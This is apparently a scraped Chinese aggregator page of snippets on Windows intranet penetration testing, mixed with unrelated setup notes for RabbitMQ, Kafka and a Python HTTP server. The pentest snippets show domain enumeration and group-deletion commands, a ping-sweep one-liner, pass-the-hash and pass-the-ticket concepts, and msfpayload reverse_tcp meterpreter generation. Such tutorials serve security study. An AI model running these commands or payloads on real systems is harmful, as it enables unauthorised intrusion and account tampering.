Windows下内网渗透常用命令总结】的更多相关文章

域内信息收集常用命令 net group /domain //获得所有域用户组列表 net group zzh /domain //显示域中zzh组的成员 net group zzh /del /domain //删除域中zzh组 net group zzh andy /del /domain //删除域内zzh 群组中的成员 andy net group zzh /add /domain //增加zzh域中的群组 net group "domain admins" /domain /…
----RabbitMq安装-----windows下安装:(1)首先windows下安装好了erlang和rabbitmq.如下地址同时下载和安装:Erlang:http://www.erlang.org/download.htmlRabbitMQ :http://www.rabbitmq.com/download.html (2)根据自己文件路径安装好,注意:安装RabbitMQ时候,取消勾选RabbitMQ Service服务 (3)配置环境变量ERLANG_HOME=D:\soft\er…
参考文档: https://blog.csdn.net/evankaka/article/details/52421314 http://orchome.com/6 1 启动zookeeper cmd进入zookeeper的bin目录,输入zkServer.cmd 2 启动kafka cmd进入kafka的安装目录 .\bin\windows\kafka-server-start.bat .\config\server.properties 创建主题, 1.进入Kafka安装目录D:\kafka…
Python简易http服务器源码 import SimpleHTTPServerimport SocketServerimport sysPORT = 80if len(sys.argv) != 2:    print("use: web.exe port")else:     PORT = int(sys.argv[1])    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler    httpd = SocketServer.T…
1.(windows)无扫描器情况下内网存活主机探测: for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl" 2.(windows)查找域中计算机名对应ip: FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i…
文章参考自三好学生域渗透系列文章 看了内网渗透第五篇文章,发现如果想要真正了解PTT,PTH攻击流程,还需要了解windows的认证机制,包括域内的kerberos协议. windows认证机制 在域渗透中,横向移动最重要是对windows认证协议的理解 首先介绍一下windows密码的Hash: 早期SMB协议在网络上传输明文口令,后来出现"LAN Manager Challenge/Response"验证机制,简称LM,由于容易被破解,微软提出了windows NT挑战/响应机制,…
title: 内网渗透之Windows认证(二) categories: 内网渗透 id: 6 key: 域渗透基础 description: Windows认证协议 abbrlink: d6b7 date: 2022-06-26 14:01:22 为什么有这篇文章呢,因为我们知道平常的Web系统有注册.登录是依赖数据库和后端的加密解密算法.那么Windows系统登录的时候是如何进行身份验证的呢,是否也有一个类似数据库的东西,或者就是一个单纯的文本呢? 参考--Windows内网协议学习NTLM…
MS提权 MS16- MS16- 提权框架 Sherlock 信息收集 ifconfig -a cat /etc/hosts arp -a route -n cat /proc/net/* ping扫描 跳板机环境分析 1.具备公网IP,所有端口可直接连接,且可访问外网 - 即可使用正向连接,又可以使用反向连接 2.跳板机受到WAF保护或有NAT限制,只有Web服务端口可以连接,跳板机可访问外网 - 使用反向连接 3.跳板机通过反向代理/端口映射提供Web服务,仅可访问80/443端口,本身无外…
(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接,针对linux想办法使用反弹shell来本地连接. ① Webshell应该都可以调用系统cmd执行一些简单的命令,那么whoami(查看当前权限),netuser(查看用户/组),systeminfo(查看系统补丁修复情况)等常见命令应该是首先被执行 探测的. I: 不具备系统权限: ①  Ser…
x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPOR…